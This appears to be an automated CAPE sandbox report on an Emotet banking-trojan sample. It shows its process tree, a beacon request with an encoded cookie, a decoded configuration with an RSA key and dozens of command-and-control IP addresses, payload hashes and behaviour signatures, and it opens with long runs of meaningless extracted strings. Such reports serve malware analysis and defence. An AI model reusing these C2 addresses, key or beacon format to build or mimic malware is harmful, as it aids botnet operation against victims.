!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
ew#et##ttt
#e#wewe#eeww
tewetteww$ewe$e
weeeteewe#$
#t#eetw#ttt
eeteetwttwe
#t$ttte#w#e#
$ttete#t$ee##ttw
w$e$te#$$wt#
#$et#tewe
$tew$$w#tee
e$t$e
ewettt$e
w#$$w#etttw#et$
t#t$e
e#eete$w$
et$$t$t$wtte$wt
ttete$ee#$$w$#et
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
11253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
$wet$##we
$#w#ewwteew$te$
#e$#w
w#ett
$##eee$wtw#w##te
te#$wttwt#wet$#
t$$tt$eweteeetew
e###$t$#$$#$eet
wete$e#$wtee
#$w#ttwe
eeeett##$et$ee
t#ee#$tt
#e#eteet#wewtw
tt##ttt
#eet##w$t#
teweeett#wtttet$
$ttette#etet
#w$eettteeet##
tee$ew$#tw#
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!12534523211253452321
!1253452321125345232!1253452321
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
tt#$wwteete$w
eeetteewt$$
wteeet#e#we
$eewtwe#e#t
tewet#et$et#t
ewe#etwte
t#ew$ttw
twe#eet
teetwee$ttee##ew
weee#t#ttteeet
##$e$$wtetwe$
e#w$e$we$e
#twte
$#$$$e#tte
ew$tt#$#e$t
#$##ewtete$
1125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
$ttwtteete#ewt
teete
tee$$wtwe#
##e##e#et
teteet$t
#t#etw$et####
w#w#e$##eeee
$$$eetwe#tewe
eweetweetwwe
t$eeeet$$ee
tet$etttw
ewewt
ttweew#t$$wtt$
#$teeww#etwwe
e$ttet#$twtew##
#$$wtwwwwww#t$
$$tee
tteetew#tttt
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!
1125345232!125345232!1253452321125345232!1253452321125345232!125345232!
$wwet$ewwttw
eetwte$$e
t$tteeete$e
$wtt$#$et#e
#wtet
t$$t#e$ee##t#$t#
$ewtt
e#t#t#wtete#
w$wt$
w###we#tw$te$#
eett#t$ee#t$
tteet
eewtt$t
te#e#eete
e###eeette$e$w
e$etww
#w#ww#wtte
$ww$ttwwe
e#eet$t
1125345232!1253452321125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!12534523211253452321125345232!125345232!125345232!125345232!
eewteww#ett##
wttt$#
#tet$
teet$e$ttt
e#eeeete$t$t#
ee$$$#twe$#wtw$t
w#ew##t
$t#t##e##eetew
tteeet
#ttt$
tttetew
weeeete#t
eet$#te$#$ee$e#
#wete#e#tttee#
t$$e$te#tt#
w$#$ewett
ewtet$##tew#tew
$tetee$wt#
wt#$$e#$tee#$t#e
#$$#eew$e$$t$
$w$$ee$e#w
!1253452321125345232!1253452321125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
$#ew$teeeeette
wew#tewwtet#
tw#t$$
$teetetww$wtttw#
twetw$ttt#et
wtt$te$ett
eee$weeteweetete
ewew#tt$#wee
e$$t#w
e$wtee
#t##e#t
ewt$#$$e
t$ee$#eteewe
#e$$#w#ttetwe$$
twe$eet#
tttteetw#ttte$$e
w$tett#e#et$$et
$ett#$$ewwtt
t#wee#wttt
$ew$$#e
1125345232!125345232!1253452321125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321125345232!1253452321125345232!
!12534523211253452321
!125345232!1253452321125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
wt#e##$e#e$tw
e#$#tetewwtte$
w$tw$e#
#$t$eetwtwwte#$
tet$e$etwet
#e$$wtwe
ee#wtt#te#t
eweettttw#e
#ttw$t$ttwt$ete
##ttteettet$t$e#
$et##e$etw$
wwteee$#
tt$eeeweeww
eete#
wettet$t
tt#$ee
w#$ttette
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
$e#te#$t$etewetw
t$etet$t
w$t###wttet
e$wwtw
$e#$$ette$$
ettett
wt$tw$etwewwt
#we#twewte#t
wteette$ete
twe#t#t#
#twtw$$
#tteet#ewt$tttte
e#ew##tw#$ettw
#wett
te#t$e#e$ww$#t
t#tw$eee$$$#$##w
t$$tww$tte$wet##
ttwewtet$ew
e##$te#$et$eeetw
1125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!1253452321125345232!
ttet#teet
wwwweet$wt
#eeeww#
t$w$t
$$wettew
ewt$#et
teet$
t#ee$e#ww$t
wtttt$tet#$#
ew#ett$e$ew#te
#tww$#eee##t#ew
ew#e#e$t
twwee$ee#
wettet
t#$tt#$$tteeteee
ttw$tte#$twwe
ee#ww#tt
ewe$$e
!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
$w$#ttet
tttet
etwteeeeetwet$e#
$et$t
eee$tettw
$twe#ete
wte#etw##$e$e$w#
#e$#$#$eet$
e#wetw#te#
tete$t
wewttette
te##$we$
tetewtte$etwww$
t#t$e$t
tt$#e#tew#tte$#e
ewtett$t$weeet
tw$e#
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
7stgA5jGRH#
J@#YHW
WJWEJKME#@WH
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904E4
CompanyName
Microsoft Corporatio
FileDescription
United Kingdom Extended Keybo
FileVersion
6.1.7600.16385
InternalName
kbdukx (3.
LegalCopyright
Microsoft Corporation. All righ
-1998
LegalTrademarks
Microsoft(R) is a registered trademark of Microsoft Corporation. Windows(TM) is a trademark of Microsoft Corporation
ProductName
Operating Syst
oordinator
ProductVersion
6.1.7600.163
This file is not on VirusTotal.

Process Tree


sPVjc.exe, PID: 2932, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\sPVjc.exe
Command Line: "C:\Users\user\AppData\Local\Temp\sPVjc.exe"
sPVjc.exe, PID: 2832, Parent PID: 2932
Full Path: C:\Users\user\AppData\Local\Temp\sPVjc.exe
Command Line: "C:\Users\user\AppData\Local\Temp\sPVjc.exe"
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
dafpanes.exe, PID: 2736, Parent PID: 460
Full Path: C:\Windows\SysWOW64\dafpanes.exe
Command Line: "C:\Windows\SysWOW64\dafpanes.exe"
dafpanes.exe, PID: 2224, Parent PID: 2736
Full Path: C:\Windows\SysWOW64\dafpanes.exe
Command Line: "C:\Windows\SysWOW64\dafpanes.exe"

Hosts

Direct IP Country Name
Y 64.32.70.194 [VT] Dominican Republic
Y 200.110.85.138 [VT] Ecuador
Y 187.131.137.216 [VT] Mexico
Y 174.84.250.37 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49184 174.84.250.37 443
192.168.35.21 49185 187.131.137.216 50000
192.168.35.21 49187 200.110.85.138 990
192.168.35.21 49186 64.32.70.194 20

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://200.110.85.138:990/
GET / HTTP/1.1
Cookie: 45902=rMhrzCuyL0l2U5eRr1HJU48t5LZnZAWh+8+r5CKdkIyYm9nbNvxHWLpJuDVZEmztQ3pEAbM8Xl8tEBfyTVyTBrwFMJtHoOSfKBPztSWjKHeLSBBi3irgweRf88G4OC6fLzAlu5A3aHOe9gkZ00NORErzSLfwOed8yrc5sZPCCVP9tXKsND0ta8iQzQflZeTURW2pM5IL6kLiO7XNPgYjoYP6WAty0WyLOquDW7EXT2jqN6tfj0QujVSYfu3qaN30+nXivEylJTN73Ce952V0C0Vp2c0Ey8sPI0wMPwXNnemduvNmHJAtnoRvdEk5ka93CGz8k3dfPR1CLV4pcVP3STX2KhTJ309xb/v5/Y9jy6kkZcykxPOvm60K2ODPEugwB+XYhYysNmoatjOiNgiLbvs5azYf3FjlIFJbg3aqCnuyLRvA
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 200.110.85.138:990
Connection: Keep-Alive
Cache-Control: no-cache

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name dafpanes.exe
Associated Filenames
C:\Windows\SysWOW64\dafpanes.exe
File Size 470528 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 656e02696cf6c513ad72c009e9d337b5
SHA1 58273d0d9c7700fa13dc63096b08967ae926db6d
SHA256 f9604051cf7518348b294c2afdc47d786cac4f51d503b26f0731dc7deee72369
CRC32 2345913F
Ssdeep 3072:Ich6OhgjArPuHPhYR/UctWYNqHfkU81o4U5oij9Fk0lNJCqfcWEj6bl13wa0gRUN:/q0X0vwa0PXqWbZR/
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
Type Emotet Config
RSA public key
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+ 0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ Wcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB -----END PUBLIC KEY-----
address
174.84.250.37:443
187.131.137.216:50000
64.32.70.194:20
200.110.85.138:990
71.174.233.71:20
187.137.46.18:20
190.55.118.192:80
179.62.226.22:21
200.110.85.138:20
187.178.89.60:443
192.163.199.254:8080
23.254.203.51:8080
181.164.188.27:8080
138.68.139.199:443
189.249.2.181:995
187.153.108.92:20
210.2.86.72:8080
187.243.193.143:20
72.47.248.48:8080
165.227.213.173:8080
189.205.249.209:20
5.9.128.163:8080
103.9.226.57:20
187.167.66.31:990
133.242.208.183:8080
72.181.91.254:21
75.139.212.94:990
78.186.71.119:8443
185.86.148.222:8080
190.34.215.74:21
219.94.254.93:8080
51.77.109.38:50000
186.176.26.59:8080
78.187.255.242:8090
201.184.41.232:443
65.34.46.157:80
109.104.79.48:8080
71.83.83.190:20
103.8.112.222:8443
69.163.33.82:8080
68.188.125.106:8443
66.91.156.90:53
190.188.114.60:993
187.207.105.37:465
159.65.76.245:443
72.203.200.234:995
79.98.31.206:443
190.171.206.194:443
92.48.118.27:8080
158.255.189.202:8090
192.155.90.90:7080
144.76.117.247:8080
66.76.135.158:22
47.44.193.210:8080
200.105.111.130:22
Download
Type Extracted Shellcode: 32-bit executable
Size 106496 bytes
Virtual Address 0x140000
Process sPVjc.exe
PID 2932
Path C:\Users\user\AppData\Local\Temp\sPVjc.exe
MD5 520c420dcffb6a949dd9ea4c10005160
SHA1 0a73f0582cf8dfc9bd20f26c1cdbc7449d3811c5
SHA256 75d8fae05121c13a53701897ab02d34ceb748c9be1acc1f6c66a2056b6e0f33d
CRC32 3F8121CE
Ssdeep 384:VOjqf6OFVXbWe1H5jMm8AtuAhCSs79XidW:VOQVLWe95AUySs7did
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Emotet Payload: 32-bit executable
Size 78336 bytes
Virtual Address 0x210000
Process sPVjc.exe
PID 2932
Path C:\Users\user\AppData\Local\Temp\sPVjc.exe
MD5 9365d5fdab6f911e3feb6c08f13c2f1a
SHA1 69a8dbfa79309a0ea3eb76fd91bd308e7240466c
SHA256 4d8278bcf3ed08cc39947ce048a910fab144b6af351d4e8cc67afef20912e85f
CRC32 28633AED
Ssdeep 1536:buYQMf62aE5vnkPb2EfBU53MWGf4gzWQe3OW8QfY+dUZLHrbzmV1ZsAfGWG:ifWbZ5kj2EfG5fMU3NfY+CZLHnzq3Ru
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Type Emotet Payload: 32-bit executable
Size 67396 bytes
Virtual Address 0x210000
Process sPVjc.exe
PID 2932
Path C:\Users\user\AppData\Local\Temp\sPVjc.exe
MD5 244ab2a893119ebc5ec3036880af12ac
SHA1 bbe8bbeb3386bb3256b9db32f88b29a24233ca83
SHA256 2c9676fd35a727b1be1124bbedfc81c88130231aa33c93dd8a1b920d545ec389
CRC32 86D2A42D
Ssdeep 1536:FcYQMf62aE5vnkPb2EfBU53MWGf4gzWQe3OW8QfY+dUZLHrbzmVO:qfWbZ5kj2EfG5fMU3NfY+CZLHnzqO
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Type Emotet Payload: 32-bit executable
Size 82432 bytes
Virtual Address 0x290000
Process sPVjc.exe
PID 2832
Path C:\Users\user\AppData\Local\Temp\sPVjc.exe
MD5 73017657aafc1365adda93018c921e3d
SHA1 1acd6091e2944db6c6b2441c6f18992bfeb5bd72
SHA256 041cba5cbe5434472390a432cc67b97609571fa6a73eae68e2a1d1ef6238b72c
CRC32 7665716A
Ssdeep 1536:6QoQl90ru2iEFvT4XiYfBunMWSf4AzWQa3OW8oXEudUpLHrbzmpEbIZsAfGWGf:rXl9OnR1UyYfEvoU3VXEuCpLHnzeEbYe
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Sorry! No process dumps.

Comments



No comments posted

Processing ( 3.608 seconds )

  • 1.954 CAPE
  • 0.412 BehaviorAnalysis
  • 0.362 Static
  • 0.306 TargetInfo
  • 0.304 Dropped
  • 0.19 TrID
  • 0.034 Deduplicate
  • 0.025 Strings
  • 0.011 NetworkAnalysis
  • 0.006 AnalysisInfo
  • 0.003 config_decoder
  • 0.001 Debug

Signatures ( 0.203 seconds )

  • 0.021 stealth_timeout
  • 0.021 antiav_detectreg
  • 0.015 api_spamming
  • 0.015 decoy_document
  • 0.011 PlugX
  • 0.008 infostealer_ftp
  • 0.007 Doppelganging
  • 0.007 injection_createremotethread
  • 0.007 InjectionCreateRemoteThread
  • 0.006 injection_runpe
  • 0.005 InjectionInterProcess
  • 0.005 InjectionProcessHollowing
  • 0.005 infostealer_im
  • 0.004 antianalysis_detectreg
  • 0.004 antiav_detectfile
  • 0.004 ransomware_files
  • 0.003 mimics_filetime
  • 0.003 antivm_generic_disk
  • 0.003 persistence_autorun
  • 0.003 infostealer_mail
  • 0.003 ransomware_extensions
  • 0.002 bootkit
  • 0.002 stealth_file
  • 0.002 antivm_generic_scsi
  • 0.002 reads_self
  • 0.002 vawtrak_behavior
  • 0.002 virus
  • 0.002 antivm_vbox_keys
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.001 lsass_credential_dumping
  • 0.001 tinba_behavior
  • 0.001 malicious_dynamic_function_loading
  • 0.001 rat_nanocore
  • 0.001 recon_programs
  • 0.001 antivm_generic_services
  • 0.001 antiemu_wine_func
  • 0.001 process_interest
  • 0.001 betabot_behavior
  • 0.001 antivm_vbox_libs
  • 0.001 kibex_behavior
  • 0.001 dynamic_function_loading
  • 0.001 cerber_behavior
  • 0.001 kovter_behavior
  • 0.001 hancitor_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vmware_keys
  • 0.001 antivm_xen_keys
  • 0.001 geodo_banking_trojan
  • 0.001 bot_drive
  • 0.001 modify_proxy
  • 0.001 disables_browser_warn
  • 0.001 recon_fingerprint

Reporting ( 0.031 seconds )

  • 0.031 CompressResults
Task ID 36422
Mongo ID 5c61cea6f284884f69b30d0a
Cuckoo release 1.3-CAPE
Delete